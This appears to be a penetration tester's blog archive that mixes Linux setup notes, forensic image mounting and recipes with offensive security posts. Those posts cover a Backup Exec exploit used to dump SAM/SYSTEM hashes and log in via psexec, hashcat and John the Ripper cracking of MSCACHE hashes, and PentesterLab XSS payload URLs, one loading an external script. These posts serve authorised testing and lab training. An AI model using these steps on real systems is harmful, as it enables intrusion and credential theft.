Install root CA into Nessus

Came across this little 'gem' today, when sorting out internal SSL certificate results for a customer who uses our internal network vulnerability scanner, which is essentially a custom web front end, with scheduling and re-mediation assignment and Nessus pro feed back-end.

Anyway, they wanted to install their own CA cert, from internal PKI, to remove SSL Certificate errors.

Alls you need to do is:

1. Save your root CA into PEM format and rename it as custom_CA.inc

cp cert.cer custom_CA.inc

2. Copy the custom_CA.inc to the Nessus lib plugins folder

sudo cp custom_CA.inc /opt/nessus/lib/nessus/plugins/

Now all those pesky SSL Certificate errors for internal network SSL based connections, wont appear in your results.

NOTE:- Dont do this for external SSL based services, you really should be using a SSL Cert signed by a recognised Certificate Authority (CA).

HTH

Installing JSteg in Ubuntu

JSteg is another great tool I have been reading about whilst brushing up on my Stego, the book is linked in my previous post.

JSteg

wget http://zooid.org/~paul/crypto/jsteg/jpeg-v4.tar.Z

 cp makefile.ansi Makefile

cp jmemansi.c jmemsys.c

make

sudo cp cjpeg djpeg /usr/local/bin

 Test it:

cjpeg -h

usage: cjpeg [switches] [inputfile]
Switches (names may be abbreviated):
  -quality N     Compression quality (0..100; 5-95 is useful range)
  -grayscale     Create monochrome JPEG file
  -optimize      Optimize Huffman table (smaller file, but slow compression)
  -targa         Input file is Targa format (usually not needed)
Switches for advanced users:
  -restart N     Set restart interval in rows, or in blocks with B
  -smooth N      Smooth dithered input (N=1..100 is strength)
  -maxmemory N   Maximum memory to use (in kbytes)
  -verbose  or  -debug   Emit debug output
Switches for wizards:
  -qtables file  Use quantization tables given in file
  -sample HxV[,...]  Set JPEG sampling factors

  djpeg -h
usage: djpeg [switches] [inputfile]
Switches (names may be abbreviated):
  -colors N      Reduce image to no more than N colors
  -gif           Select GIF output format
  -pnm           Select PBMPLUS (PPM/PGM) output format (default)
  -quantize N    Same as -colors N
  -targa         Select Targa output format
Switches for advanced users:
  -blocksmooth   Apply cross-block smoothing
  -grayscale     Force grayscale output
  -nodither      Don't use dithering in quantization
  -onepass       Use 1-pass quantization (fast, low quality)
  -maxmemory N   Maximum memory to use (in kbytes)
  -verbose  or  -debug   Emit debug output

HTH

 

 

Install StegHide in Ubuntu

I've recently been brushing up on my Stego, and have been reading an excellent book called "Data Hiding"; highly recommended reading.

Anyway I've been installing most of the tools used in the book and have found that most of them are quite old and take a bit of work to compile. I'm making notes here, on how I've achieved the install on my host, currently Ubuntu 12.04

StegHide

You need a few dependencies here:

sudo apt-get install -y libjpeg-dev libmcrypt-dev libmhash-dev

Then you can try to compile the source; I still couldnt get it to complie, so installed a .deb from Launchpad!

wget http://launchpadlibrarian.net/5049761/steghide_0.5.1-8_amd64.deb && sudo dpkg -i steghide_0.5.1-8_amd64.deb

Try it:

steghide 

steghide version 0.5.1

the first argument must be one of the following:

 embed, --embed          embed data

 extract, --extract      extract data

 info, --info            display information about a cover- or stego-file

   info       display information about

 encinfo, --encinfo      display a list of supported encryption algorithms

 version, --version      display version information

 license, --license      display steghide's license

 help, --help            display this usage information

embedding options:

 -ef, --embedfile        select file to be embedded

   -ef        embed the file

 -cf, --coverfile        select cover-file

   -cf        embed into the file

 -p, --passphrase        specify passphrase

   -p       use to embed data

 -sf, --stegofile        select stego file

   -sf        write result to instead of cover-file

 -e, --encryption        select encryption parameters

   -e []|[]  specify an encryption algorithm and/or mode

   -e none               do not encrypt data before embedding

 -z, --compress          compress data before embedding (default)

   -z                 using level (1 best speed...9 best compression)

 -Z, --dontcompress      do not compress data before embedding

 -K, --nochecksum        do not embed crc32 checksum of embedded data

 -N, --dontembedname     do not embed the name of the original file

 -f, --force             overwrite existing files

 -q, --quiet             suppress information messages

 -v, --verbose           display detailed information

extracting options:

 -sf, --stegofile        select stego file

   -sf        extract data from

 -p, --passphrase        specify passphrase

   -p       use to extract data

 -xf, --extractfile      select file name for extracted data

   -xf        write the extracted data to

 -f, --force             overwrite existing files

 -q, --quiet             suppress information messages

 -v, --verbose           display detailed information

options for the info command:

 -p, --passphrase        specify passphrase

   -p       use to get info about embedded data

To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt

To extract embedded data from stg.jpg: steghide extract -sf stg.jpg

HTH

Join 2008 R2 to Windows 2000 Domain

So in my lab, that I carry around on my laptop, to replicate client setup's, I have many flavours of Windows and they are generally joined to a domain.

Today, I wanted to add a Windows 2008 R2 VM to a Windows 2000 Domain, so off I went:

Start > Run > dcpromo

I ran through the install and got the following error:

 Me being me, i'm always in a rush and didnt realise this had to be run on the existing domain. I was trying for about 10 minutes to run it on the 2008 R2 box:

So I ran it on the existing Win2K DC (don't shout, this is a vulnerable lab - you know!), however it didn't like it at all and I got an error about running a 64bit version of the adprep.exe! So, I Google searched and lovely TechNet told me that I need to download a 32bit version of Windows 2008, but not to worry as I could use the eval version. - http://technet.microsoft.com/en-us/library/cc731728(v=ws.10).aspx

In the same folder as the adprep.exe is a an adprep32.exe - run that sh*t and your cooking on the gas:

adprep32.exe /forestprep

Now as long as your a member of the Enterprise Admins group and you've replicated at least once, you should be winning:

Now you'll need to change the Windows 2000 domain to Native Mode:

Now you need to run:

adprep32.exe /domainprep

You should have a successful message:

 Now run, dcpromo on the Windows 2008 box and you should be home free:

One more GIF, cause I know you like them so much ;-)

HTH

Cannot register the DVD image '/usr/share/virtualbox/VBoxGuestAdditions.iso'

Came across this lovely error today, when updating VirtualBox on an old laptop from 4.1 to 4.2:

Cannot register the DVD image '/usr/share/virtualbox/VBoxGuestAdditions.iso' {20f4b244-eb29-4082-ac34-4acf6ccb4904} because a CD/DVD image '/usr/share/virtualbox/VBoxGuestAdditions.iso' with UUID {62ebaac7-ba6d-4d7d-876b-362642de4c1b} already exists

Was like, "sh*t, my VM's are dead"!

Edit the '.vbox' file for the VM in question:

$ sudo nano -c /path/to/virtualbox/vm.vbox

Delete any lines that are located between the tags:

'<'DVDImages'>' and '<'/DVDImages'>'

Save the file and start your VM.

HTH

Installing VBox Guest Additions in Fedora

You need a few extra bits before you can install Guest Additions in Fedora:

$ yum install kernel-headers kernel-devel gcc

Then go for it:

 $ cd /run/media/mac/VBOXADDITIONS_4.2.16_86992

 $ sudo ./VBoxLinuxAdditions.run

 Finally, when the installer finishes, we need to add our user to the 'vboxusers' group:

$ sudo usermod -a -G vboxusers {user}

Replace {user} with your username. Then reboot to finish.

HTH

Sawmill Log File Analyser on Ubuntu

Quick post. Today I was trying to get SawMill log file analyser working on Ubuntu and it kept failing to load due to missing library, error:

mac [ ~/Tools/sawmill ]$ ls
Extras  LICENSE  LogAnalysisInfo  README  sawmill
mac [ ~/Tools/sawmill ]$ ./sawmill
./sawmill: error while loading shared libraries: libcrypto.so.0.9.8: cannot open shared object file: No such file or directory

So I looked at the dependencies the script needed:

mac [ ~/Tools/sawmill ]$ ldd ./sawmill
linux-vdso.so.1 =>  (0x00007fffc07ff000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f515b72a000)
libnsl.so.1 => /lib/x86_64-linux-gnu/libnsl.so.1 (0x00007f515b510000)
libresolv.so.2 => /lib/x86_64-linux-gnu/libresolv.so.2 (0x00007f515b2f3000)
libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007f515b0dc000)
libcrypto.so.0.9.8 => not found
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f515aebe000)
libssl.so.0.9.8 => not found
libstdc++.so.6 => /usr/lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007f515abbe000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007f515a8c1000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007f515a6ab000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f515a2ec000)
/lib64/ld-linux-x86-64.so.2 (0x00007f515b94a000)

There it is, packages libssl and libcrypto. Now I would have thought libssl-dev would have covered these, but no:

mac [ ~/Tools/sawmill ]$ sudo apt-get install libssl-dev
Reading package lists... Done
Building dependency tree    
Reading state information... Done
libssl-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

A little Google search and the solution was:

sudo apt-get install libssl0.9.8
Reading package lists... Done
Building dependency tree    
Reading state information... Done
The following NEW packages will be installed
  libssl0.9.8
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 861 kB of archives.
After this operation, 2,391 kB of additional disk space will be used.
Get:1 http://gb.archive.ubuntu.com/ubuntu/ precise-updates/universe libssl0.9.8 amd64 0.9.8o-7ubuntu3.1 [861 kB]
Fetched 861 kB in 0s (2,344 kB/s)
Preconfiguring packages ...
Selecting previously unselected package libssl0.9.8.
(Reading database ... 242938 files and directories currently installed.)
Unpacking libssl0.9.8 (from .../libssl0.9.8_0.9.8o-7ubuntu3.1_amd64.deb) ...
Setting up libssl0.9.8 (0.9.8o-7ubuntu3.1) ...
Processing triggers for libc-bin ...
ldconfig deferred processing now taking place

Winner, winner, chicken dinner!

mac [ ~/Tools/sawmill ]$ ./sawmill
Sawmill 8.6.2.1; Copyright (c) 1996-2013 Flowerfire, Inc.
Web server running; browse http://192.168.0.14:8988/ to use Sawmill.
To run on a different IP address, use "sawmill -sh ip-addr -ws t"

HTH

Veritas Backup Exec Windows Remote File Access

Whilst on a client engagement today, I came across some Windows 2003 application server's using the Veritas Backup Exec client.

The version in use was affected by a vulnerability highlighted in CVE-2005-2611.

"VERITAS Backup Exec for Windows Servers 8.6 through 10.0, Backup Exec for NetWare Servers 9.0 and 9.1, and NetBackup for NetWare Media Server Option 4.5 through 5.1 uses a static password during authentication from the NDMP agent to the server, which allows remote attackers to read and write arbitrary files with the backup server."

Metasploit has a nice little module for downloading files and directories from the box, it located here:

auxiliary/admin/backupexec/dump

Its very straightforward to use.

Set the path of the file you want to download, in my case I went for the C:\Windows\repair folder, to get the SYSTEM and SAM files.

Then you need to set the port that the client is listening on, in my case the default port of 10000 was in use.

Then run.

The module download's the file or directory, but its format is MTF. 

I did a little digging around and MTF is an acronym for Microsoft Tape Format, which is an old school compression format.

The Metasploit module says the following:

"This module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program listed in the references section. To transfer an entire directory, specify a path that includes a trailing backslash."

and has the following references:

• 
  
• CVE-2005-2611
• OSVDB-18695
• BID-14551
• http://www.fpns.net/willy/msbksrc.lzh

Well, the http://www.fpns.net/willy/msbksrc.lzh link, doesn't do a thing and the others are just vulnerability references.

More Googling found this mirror site:

http://www-afs.secure-endpoints.com/afs/acm/mirrors/i386_nt40/util/

And I download the following files:

        Friday, July 09, 2004  9:33 AM       123909 msbkdos.lzh
        Friday, July 09, 2004  9:33 AM       127385 msbklin.lzh
        Friday, July 09, 2004  9:34 AM       107354 msbksrc.lzh
        Friday, July 09, 2004  9:34 AM       121070 msbkwin.lzh

Now, I don't normally run files from any old site on my host, but this was a last straw for me and the only vulnerability in quite a tidy network. So I uploaded the 4 .lzh files to a windows virtual machine along with the .mtf file, produced by the Metasploit module, and disconnected the network adapter to the VM - just to be on the safe side!

I unpacked the msbkwin.lzh with 7zip and found a few files, the one to use is NTBKUP.exe and you want to use it like this:

c:\msbkwin\NTBKUP.EXE {metasploit_backup_exec_dump_module_file.mtf) -x

This extracted the contents of the C:\Windows\repair\ directory, that was downloaded from the 2003 server I exploited.

This worked for me, I got the local Administrator hash from the SYSTEM file, and used the Metasploit psexec module to login to the box. 

HTH

Mounting Encase Images in Linux

So recently I've been solving some of the Digital Corpora, scenario based Forensic challenges. Image files are created using the commercial tool, EnCase. The tool takes an exact image of the disk and creates a file known as Expert Witness Format or the EnCase Image Format.

These images can be converted, without damaging the original file-system, to 'dd' format and browsed like any other file system in Linux.

For the example below, I am going to use two EnCase image files, used in the M57-Jean Forensic Scenario on the Digital Corpora web site.

This guide explains how to mount an EnCase image using 'xmount' and 'dd'.

$ sudo -s

# apt-get install ewf-tools xmount dd

'cd' to the directory where you have the EnCase image and use 'ewfinfo' to look at the EnCase image details.

# cd Forensic_Challenges

# ewfinfo nps-2008-jean.E01

mac [ ~/Forensic_Challenges ]$ ewfinfo nps-2008-jean.E01

ewfinfo 20100226 (libewf 20100226, libuna 20091031, libbfio 20091114, zlib 1.2.3.4, libcrypto 1.0.0, libuuid)

Acquiry information

Description: Jean's hard drive from the first M57 project

Examiner name: Donny

Evidence number: 2008-M57-Jean

Acquiry date: Mon Jan 31 21:38:29 2011

System date: Mon Jan 31 21:38:29 2011

Operating system used: Darwin

Software version used: 20101104

Password: N/A

EWF information

File format: EnCase 6

Sectors per chunk: 64

Error granularity: 64

Compression type: best compression

GUID: 5005a83f-a4db-a14b-b645-5c55e6b2bec8

Media information

Media type: fixed disk

Is physical: no

Bytes per sector: 512

Amount of sectors: 20971520

Media size: 10 GiB (10737418240 bytes)

Digest hash information

MD5: 78a52b5bac78f4e711607707ac0e3f93

Make a note of the MD5 sum of the image (highlighted above, in red).

Create a location to mount the EnCase image (You can name this directory as you wish, I'm a bit anal with directory names, I forget things easily, so name directories with obvious names).

# mkdir /mnt/temp_image_mount

It's always good to have a look at the man' page for a command before just randomly executing commands into your machine.

# man xmount

xmount(1)                                                      xmount                                                     xmount(1)

NAME

       xmount - Tool to crossmount between multiple input and output harddisk image files

SYNOPSIS

       xmount [[fopts] [mopts]] [ [...]]

DESCRIPTION

       xmount  allows  you  to  convert on-the-fly between multiple input and output harddisk image types. xmount creates a virtual

       file system using FUSE (Filesystem in Userspace) that contains a virtual representation of the input image. The virtual rep‐

       resentation  can  be  in  raw  DD,  VirtualBox's  virtual disk file format, Microsoft's Virtual Hard Disk Image format or in

       VmWare's VMDK file format. Input images can be raw DD, EWF (Expert Witness Compression Format)  or  AFF  (Advanced  Forensic

       Format)  files.  In  addition,  xmount  also supports virtual write access to the output files that is redirected to a cache

       file. This makes it possible to boot acquired harddisk images using QEMU, KVM, VirtualBox, VmWare or alike.

OPTIONS

       fopts: (Options specific to FUSE)

         -d: Enable FUSE's and xmount's debug mode.

         -h: Display this help message.

         -s: Run single threaded.

         -o no_allow_other: Disable automatic addition of FUSE's allow_other option.

         -o :

           Specify fuse mount options. Will also disable automatic addition of FUSE's

           allow_other option!

         INFO: For VMDK emulation, you have to uncomment "user_allow_other" in

               /etc/fuse.conf or run xmount as root.

       mopts: (Options specific to xmount)

         --cache :

           Enable virtual write support and set cachefile to use.

         --in :

           Specify input image type. Type can be "dd" or "ewf".

         --info :

           Print out some infos about used compiler and libraries.

         --out :

           Specify output image type. Type can be "dd", "vdi", "vhd", "vmdk(s)".

         --owcache :

           Same as --cache but overwrites existing cache.

         --rw :

           Same as --cache.

         --version :

           Same as --info.

         INFO: Input and output image type defaults to "dd" if not specified.

       ifile:

         Input image file. If you use EWF files, you have to specify all image

         segments! (If your shell supports it, you can use .E?? as file

         extension to specify them files)

       mntp:

         Mount point where virtual files should be located.

BUGS

       Hopefully none. If you find any, please e-mail to .

EXAMPLE

       To xmount an EWF image from your acquired disk as a raw DD image under /mnt, use the following command:

         xmount --in ewf ./acquired_disk.E?? /mnt

So we can see how it works right here ^^, and mount it pretty easily. 'xmount' will be able to mount both E01 and E02 images as one .dd image. To tell it to do this we use '??':

# sudo xmount --in ewf xmount --in ewf nps-2008-jean.E?? /mnt/temp_image_mount

If all worked correctly, you should have created a 'dd' combining the images:

# ls -alth

mac [ /mnt/temp_image_mount ]$ ls -alth

total 4.0K

drwxr-xr-x 5 root root 4.0K May 31 18:28 ..

drwxrwxrwx 2 root root    0 Jan  1  1970 .

-r--r--r-- 1 root root  10G Jan  1  1970 nps-2008-jean.dd

-r--r--r-- 1 root root  334 Jan  1  1970 nps-2008-jean.inf

To ensure we haven't altered the original disk image, we can do a 'md5sum' of the 'dd' image and compare it to the original md5 calculation:

# md5sum nps-2008-jean.dd

mac [ /mnt/temp_image_mount ]$ md5sum nps-2008-jean.dd 

78a52b5bac78f4e711607707ac0e3f93  nps-2008-jean.dd

Compare that MD5 string to that outputted in our original ewfinfo command, and if we have a match, we have a forensically sound, copy of the original image. This means we can analyse the 'dd' image without evr altering the original EnCase image.

To mount this 'dd' image we need a further bit of information and we can get this with the 'fdisk' command:

# fdisk -l nps-2008-jean.dd

mac [ /mnt/temp_image_mount ]$ sudo fdisk -l nps-2008-jean.dd 

Disk nps-2008-jean.dd: 10.7 GB, 10737418240 bytes

255 heads, 63 sectors/track, 1305 cylinders, total 20971520 sectors

Units = sectors of 1 * 512 = 512 bytes

Sector size (logical/physical): 512 bytes / 512 bytes

I/O size (minimum/optimal): 512 bytes / 512 bytes

Disk identifier: 0x39bf39be

Device                       Boot   Start         End              Blocks        Id  System

nps-2008-jean.dd1   *          63             20948759    10474348+   7   HPFS/NTFS/exFAT

So we can see that the volume is in NTFS format and we can see the starting sector. So to mount it with the linux 'mount' command, we need to specify the offset as well as the attribute in which we wish to mount it, we also need to create a directory to mount the dd image. 

# mkdir /mnt/nps-2008-jean

To calculate the offset we need to multiple the starting sector by 512, so in my case:

63 * 512 = 32256

(This assumes 63 sectors per track and 512 bytes per sector).

# mount -t ntfs -o ro,offset=32256 nps-2008-jean.dd /mnt/nps-2008-jean/

If everything worked as it should, you should be able to open your favourite file manager, and browse to /mnt/nps-2008-jean

# caja /mnt/nps-2008-jean/

HTH

Debian Optirun/Bumblebee/Ironhide on GT 525M 1 GB and HashCat

So I have a nice little GPU in my testing laptop and have just got it running with Optirun/Bumblebee/Ironhide so I can use it with oclHashCat-Plus.

First you need to add the Debian Bumblebee repo:

$ sudo -s

# wget -O - http://suwako.nomanga.net/suwako.asc | apt-key add -

# nano /etc/apt/sources.list

add the following lines

deb http://suwako.nomanga.net/debian sid main contrib
deb-src http://suwako.nomanga.net/debian sid main

# apt-get update

# apt-get install bumblebee bumblebee-nvidia

# adduser {user} bumblebee

# reboot

Once your back on, test its working by running:

$ optirun glxgears -info

If you see three cogs pop up in a windows and they turn, it's game on!

Now a real test, hashcat. You need a few libs to run hashcat

$ sudo apt-get install -y libcuda1

$ cd /opt

$ wget http://hashcat.net/files/oclHashcat-plus-0.14.7z

$ sudo apt-get install p7zip

$ sudo 7zip -d oclHashcat-plus-0.14.7z

$ cd oclHashcat-plus-0.14

Now hashcat can be a bitch to use as every cmd option has to be in the right place; however, it's frick*n awesome, especially with a GPU and there's plenty of info on how to use it here.

Quick e.g using hashes dumped from MSCACHE, which I'm always attempting to crack ;-) -

./cudahashcat-plus64.bin -m 1100 {hash-file.cap} {wordlist.txt} -r rules/d3ad0ne.rule -o output.txt

Replace {hash-file.cap} with your captured hash file, hashcat will only accept them in the format - administrator:2758937hedfsdjkhgfjk and replace {wordlist.txt} with the wordlist of your choice.

Wordlists - there's only one for me:

http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2

Happy Cracking ;-)

Compiling Jumbo John (JTR) for MSCACHE Password Auditing

So to attempt a password audit on MSCACHE v2 password hashes you will need to compile John The Ripper Jumbo.

$ wget http://openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz

$ tar zxvf john-1.7.9-jumbo-7.tar.gz

$ cd john-1.7.9-jumbo-7/src/

$ make linux-x86-64 (for 64 bit OS)

$ sudo make install

John will be found in the 'run' directory

$ cd ../run

$ ./john --format=mscash {dumpfile.cap}

Loaded X password hashes with X different salts (M$ Cache Hash MD4 [32/64])

HTH

Debian Wheezy and Sun Java Development Kit

Due to Oracle's bullsh*t redistribution license it's not possible to install Sun Java 7 with the apt packaging manager.

So to install, we need to do a bit a manual malarchy

$ sudo -s

# cd /opt

# wget http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-linux-x64.tar.gz

# tar xvf jdk-7-linux-x64.tar.gz

# update-alternatives --install /usr/bin/java java /opt/jdk1.7.0_17/bin/java 1

# update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_17/bin/javac 1

# update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so 1

# update-alternatives --set java /opt/jdk1.7.0_17/bin/java

# update-alternatives --set javac /opt/jdk1.7.0_17/bin/javac

# update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_17/jre/lib/amd64/libnpjp2.so

Now test that it's worked:


# java -version

java version "1.7.0_17"
Java(TM) SE Runtime Environment (build 1.7.0_17-b02)
Java HotSpot(TM) 64-Bit Server VM (build 23.7-b01, mixed mode)

Job done!

HTH

PentesterLab - Web For Pentester - XSS Example 9

This example is a DOM-based XSS. This page could actually be completely static
and still be vulnerable.

In this example, you will need to read the code of the page to understand what is
happening. When the page is rendered, the JavaScript code uses the current URL
to retrieve the anchor portion of the URL (#...) and dynamically (on the client side)
write it inside the page. This can be used to trigger a XSS if you use the payload as
part of the URL

Payload

http://192.168.56.101/xss/example9.php#Bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E

PentesterLab - Web For Pentester - XSS Example 8

Here, the value echoed back in the page is correctly encoded. However, there is still
a XSS in this page. To build the form, the developer used and trusted PHP_SELF
which is the path provide by the user.


Trusting the path provided by users is a common mistake and it can often be used
to trigger XSS along other issues. It's pretty common in pages with forms and in
error pages (404 and 500 pages).

Payload

http://192.168.56.101/xss/example8.php/%22%3E%3Cscript%3Ealert%28String.fromCharCode%2866,%20111,%2098,%2098,%20121,%2032,%2068,%2097,%20122,%20122,%20108,%20101,%20114%29%29%3C/script%3E

PentesterLab - Web For Pentester - XSS Example 7

This example is similar to the one before, however, you won't be able to use special
characters since they will be HTML encoded. As you will see, you don't really need
any of these characters.

This issue is common in PHP web application because the well known function
used to HTML-encode character (htmlentities) does not encode single quotes (')
unless you told it to using the ENT_QUOTES flag.

Payload

http://192.168.56.101/xss/example7.php?name=Bobby%27;alert%28String.fromCharCode%2868,%2097,%20122,%20122,%20108,%20101,%20114%29%29//

PentesterLab - Web For Pentester - XSS Example 6

Here, the source code of the HTML page is a bit different. If you read it, you will see
that the value you are sending is echoed back inside JavaScript code.

Payload

http://192.168.56.101/xss/example6.php?name=%3C?%20echo%28%27%3CSCR%29%27;echo%28%27IPT%3Ealert%28%22Dazzler%22%29%3C/SCRIPT%3EBobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E

PentesterLab - Web For Pentester - XSS Example 5

In this example, <script> tag is accepted and gets echoed back. But as soon as
you try to inject a call to alert, the PHP script stops its execution. The problem
seems to come from a filter on the word alert.

Payload

http://192.168.56.101/xss/example5.php?name=%3CSCRIPT/XSS%20SRC=%22http://ha.ckers.org/xss.js%22%3E%3C/SCRIPT%3E

Again, this isn't the way the paper wanted the alert box to be generated but it's still XSS all the same; just populated from an external source http://ha.ckers.org/xss/.js

PentesterLab - Web For Pentester - XSS Example 4

In this example, the developer decided to completely blacklist the word script: if
the request matches script, the execution stops.

Payload
http://192.168.56.101/xss/example4.php?name=%3Cdiv%20onmouseover=%27alert%281%29%27%20/%3E

PentesterLab - Web For Pentester - XSS Example 3

You notified the developer about your bypass. He added more filtering and now
seem to prevent your previous payload. However, he is making a terrible mistake in
his code (which was also present in the previous code)...

Payload

http://192.168.56.101/xss/example3.php?name=Bobby%3Cp%20onmouseover=alert%28%27Dazzl%27%29%3Eer%3C/p%3E

This isn't the way the paper wants you to pop the XSS but I had the payload correct and it wouldn't pop, the correct payload, that should of popped was:

http://192.168.56.101/xss/example3.php?name=Annoying<<script<>script>alert('Dazzler')<</script<>/script>

Which produced this:

If you know why this didn't work, feel free to comment!

PentesterLab - Web For Pentester - XSS Example 2

In the second example, a bit of filtering is involved. The web developer added some
regular expression to prevent the simple XSS payload to work.

Payload

http://192.168.56.101/xss/example2.php?name=Bobby<SCript>alert('Dazzler')</SCript>

PentesterLab - Web For Pentester - XSS Example 1

The first vulnerable example is just here to get you started with what is going on
when you find a XSS. Using the basic payload, you should be able to get an alert
box.

Payload:

http://192.168.56.101/xss/example1.php?name=bobby%3Cscript%3Ealert%28%27Dazzler%27%29%3C/script%3E

RECIPE - Slow cooked Greek chicken

• Slow cooked Greek chicken

Another easy one, and the chicken will melt in your mouth ... trust me ;-)

• 
  
• 80g of any flour
• 1 teaspoon of salt
• 1/2 teaspoon dried oregano
• 6 x good quality chicken breast fillets, boneless & skinless
• 1 x Tin of Heinz, Cream of Chicken soup
• 125ml white wine 
• 1 x Knorr Chicken Stock Cube

1 - Mix the flour, salt and oregano together in a large bowl

2 - Score the chicken with a sharp knife, about half way through the breast

3 - Rub the mix into the breasts ;-)

4 - Mix your stock cube with 1/2 pint of boiling water and throw it in the slow cooker

5 - Add the wine and the chicken soup to the slow cooker

6 - Add the chicken breasts

7 - Cook for 4 hours on high or 8 hours on low.

Serve with sticky rice

B00000M

Debian 7 and Gnome

I'm a die hard Debian fan and was recently shocked to find there was no Gnome 2 in the new release, Wheezy.

I searched around a bit and found there was also no fall-back Gnome mode to Debian 7 (Wheezy), etiher. There is no way I can work with Gnome 3. Its a f*cking atrocity in my opinion. 

So I hit the forums and spoke to people to see what they are doing. Many mentioned Mate - Mate you ask?!

http://mate-desktop.org/

There she is, my lovely - Gnome 2 or now called Mate!

Mate is a fantastic fork of Gnome 2 and are continuing the goodness for all us die hard Gnome 2 fans out there.

How do I get this Mate, you ask?

Well it couldn't be easier, the instructions are all at http://wiki.mate-desktop.org/download but ill run through them, just so I can pad out this blog post:

sudo nano /etc/apt/sources.list

add the following line:

deb http://repo.mate-desktop.org/debian wheezy main

sudo apt-get update

sudo apt-get install mate-archive-keyring

sudo apt-get update

sudo apt-get install mate-desktop-environment-extra

sudo reboot

Now choose Mate from the list of Desktops on your login screen and sit back and enjoy the goodness of good ole Gnome 2.

HTH

Windows Bootable USB

Extracting the ISO to USB

First well need a few bits installed. I'm doing this on a Debian host but I'm sure the packages are there for EL or any other flavour ;-)

su -c `apt-get install ntfs-3g gparted -y

So then we need to clean up the USB stick with gparted.

Format it to ntfs using all the space.(Make sure you format the right drive, otherwise you'll FUBAR your OS) and make a note of the drive number.

Then we need a temporary mount point:

$ mkdir /tmp/windows_usb

Now we mount our ISO

$ mount windows_iso.iso /tmp/windows_usb

Now copy over then contents of your ISO to wherever your USB key is mounted, mines in 
/media/37265723dhgsdhg23857/

$ cp -r /tmp/windows_usb/* /media/

Will probably take a while depending on speed of USB key.

Now were going to need a little tool called ms-sys, and it probably wont be in your standard OS 
repo's, but it's at sourceforge and you'll also need to install some tools for building stuff from source:

$ sudo apt-get install build-essential module-assistant gettext-y

$ wget http://prdownloads.sourceforge.net/ms-sys/ms-sys-2.3.0.tar.gz

$ tar xvf ms-sys-2.3.0.tar.gz ; cd ms-sys-2.3.0 ; make ; sudo make install

If all is well you should have no errors and be ready to write a master boot record to the USB drive:

$ ms-sys -7 /dev/sd{?}

Replace {?} with the disk number of your device (noted from gparted)

Now you should have a bootable Windows USB key!

RECIPE - Slow Cooked Pork Chops

Slow Cooked Pork Chops

Another slow cook favourite of mine is the Pork Chops.

1/4 Mug of good olive oil
1 Mug of Chicken broth (Knorr pods are good)
2 Minced garlic cloves
1 Tablespoon of Paprika
1 Tablespoon of Garlic Powder
1 Teaspoon of dried oregano
1 Teaspoon of dried basil
4 thick cut pork chops
Salt + Black Pepper

Cut some scores about 1/2 way through the Pork chops and rub salt and black pepper into them.

Dissolve your Knorr chicken stock pod into a mug of boiling water and throw it into the slow cooker. Throw in the chopped garlic, paprika, garlic powder, oregano and basil.

Add the pork chops to the mix.

Turn every hour for four hours. Job done.

Serve with buttery mash or sticky rice.

Lurvly!

Windows XP SP2 Windows Update Error 0x80244019

So I had to build a Windows XP machine for some testing I was carrying out tonight and came across Error 0x80244019 when trying to run Windows Update.

It turns out the Microsoft have blocked IE6 from accessing the Windows Update web site and downloading the Windows Update 3.1 Active X controls.

So what you need to do is, download and install IE8 and Windows Update Services in the following order:

1. Upgrade to Internet Explorer 8 (IE8)
DOWNLOAD
2. Reboot Machine.
3. Download Windows Update Agent
DOWNLOAD
4. Save the .exe file to your C: drive
5. Click Start, and then click Run. 
6. Type "C:\WindowsUpdateAgent30-x86.exe /wuforce"  then click OK
7. Install Windows Update agent.
8. Restart the PC and try Windows Updates again.


You should now be able to install the Windows Update Active X control and begin installing the mammoth amount of updates that your XPSP2 build will be missing.

HTH

Installing Virutal Box Guest Additions on Debian

I had a little nightmare with this and couldn't get my head round why I didnt have the kernel headers even though I had installed build-essential. So here's how I did it.

sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get install build-essential module-assistant -y
sudo m-a prepare -y

Click on Install Guest Additions from the Devices menu:

Then cancel the autorun prompt as that never works!

Finally,
sudo sh /media/cdrom/VBoxLinuxAdditions.run, and follow the instructions on screen

Restart your VM and it should be job done.

HTH!